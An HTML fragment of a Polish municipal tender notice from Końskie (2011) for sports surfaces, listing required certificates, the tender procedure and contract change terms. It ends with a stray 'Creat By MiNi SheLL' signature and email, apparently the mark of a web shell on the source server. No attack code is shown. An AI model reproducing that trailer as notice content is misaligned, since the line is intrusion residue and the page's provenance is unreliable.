<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-dokument wydany przez uprawniony podmiot zawierający wyniki badań potwierdzające parametry oferowanej kauczukowej nawierzchni sportowej, na przykład aprobata 
lub rekomendacja ITB,  sprawozdanie Labosport,
-kartę techniczną oferowanej kauczukowej nawierzchni sportowej potwierdzoną przez 
jej producenta, która zawiera parametry oferowanej nawierzchni,
-atest higieniczny na oferowaną kauczukową nawierzchnię sportową 
-autoryzację producenta kauczukowej nawierzchni sportowej, wystawioną dla Wykonawcy
 na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta 
na tę nawierzchnię 
-certyfikat IAAF CLASS 1 (klasa pierwsza) wydany na oferowaną kauczukową nawierzchnię sportową,
-próbkę oferowanej kauczukowej nawierzchni sportowej o wymiarach minimum 15 x 10 cm 
z oznaczeniem producenta i typu oferowanego produktu;
-autoryzację producenta murawy naturalnej (darni), wystawioną dla wykonawcy 
na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta 
na tę nawierzchnię,
-paszport murawy naturalnej potwierdzający jej wiek,
-autoryzacja części wzmocnionej murawy naturalnej dla Wykonawcy wystawiona i podpisana przez Producenta, z określeniem przeznaczenia (nazwa inwestycji).
-próbka oferowanego produktu  wzmocnionej murawy o wymiarach min. 20x15cm.
-karta techniczna części wzmocnionej podpisana przez producenta z określeniem przeznaczenia (nazwa inwestycji).
-atest higieniczny na oferowany produkt części wzmocnionej</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany FORMULARZ OFERTOWY, którego wzorzec przedstawiono w rozdziale D niniejszej specyfikacji istotnych warunków zamówienia
b)  Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia oraz zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. 
W tym celu musi w szczególności przedstawić pisemne zobowiązanie takich podmiotów 
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
c) Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informacje banku lub spółdzielczej kasy oszczędnościowo kredytowej dotycząca podmiotu, z którego zdolności finansowej korzysta 
na podstawie art. 26 ust. 2b ustawy potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d) Jeżeli Wykonawca z uzasadnionej przyczyny nie może przedstawić wymaganych dokumentów celem potwierdzenia spełniania warunku dotyczącego jego sytuacji ekonomicznej  i finansowej może przedłożyć inny dokument który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.
e) kosztorys ofertowy- ze względu na ryczałtowy charakter wynagrodzenia kosztorys ofertowy 
ma charakter pomocniczy wszelkie w błędy wynikające z w/w dokumentu nie będą miały wpływu na ocenę oferty 
f)   Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik, lub w przypadku wykonawców składających ofertę wspólną. Forma pełnomocnictwa: oryginał lub kopia poświadczona przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy stosunku 
do treści oferty w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia.
1.1.	Zmiana sposobu spełnienia świadczenia - zmiana przedstawicieli uczestników procesu inwestycyjnego. 
1.2.	Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ
1.3 Zmiana obowiązującej stawki VAT Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie wykonawcy Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku zapłaconego przez Wykonawcę
1.4 Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. 
W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone.
Ewentualne wyłączenia robót, realizowane będą na podstawie zatwierdzonych przez Zamawiającego protokołów konieczności
Za roboty wyłączone, strony ustalają wynagrodzenie na podstawie zatwierdzonego przez Zamawiającego kosztorysu sporządzonego przez Wykonawcę z zastosowaniem cen jednostkowych i wskaźników, określonych w kosztorysie, sprawdzonego przez Koordynatora i Inspektora Nadzoru. 
1.5	Wystąpienie robót zamiennych:
Ewentualne roboty zamienne, realizowane będą na podstawie zatwierdzonych przez Zamawiającego protokołów konieczności oraz wprowadzeniu zmian przez Projektanta. Za roboty zamienne, strony ustalają wynagrodzenie na podstawie zatwierdzonego przez Zamawiającego kosztorysu sporządzonego przez Wykonawcę z zastosowaniem cen jednostkowych i wskaźników, określonych w kosztorysie, sprawdzonego przez Koordynatora.
     Rozliczenia robót zamiennych nie mogą powodować zmian wynagrodzenia umownego

1.6 Dopuszcza się zmiany harmonogramu rzeczowo-finansowego jeżeli jest to konieczne do właściwej realizacji umowy  pod warunkiem, że nie spowodują zmiany terminu realizacji umowy
2. 	Zmiana niniejszej umowy o której mowa w §  7 umowy oraz nieistotne zmiany umowy   wymagają pisemnego aneksu pod rygorem nieważności i nie mogą być sprzeczne 
z postanowieniami ustawy z dnia 29.01.2004r. Prawo Zamówień Publicznych 
w szczególności z jej art. 144.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umkonskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1 pok. 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2011 godzina 09:00, miejsce: Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1 pok. 24 ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ministerstwo Sportu i Turystyki RP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com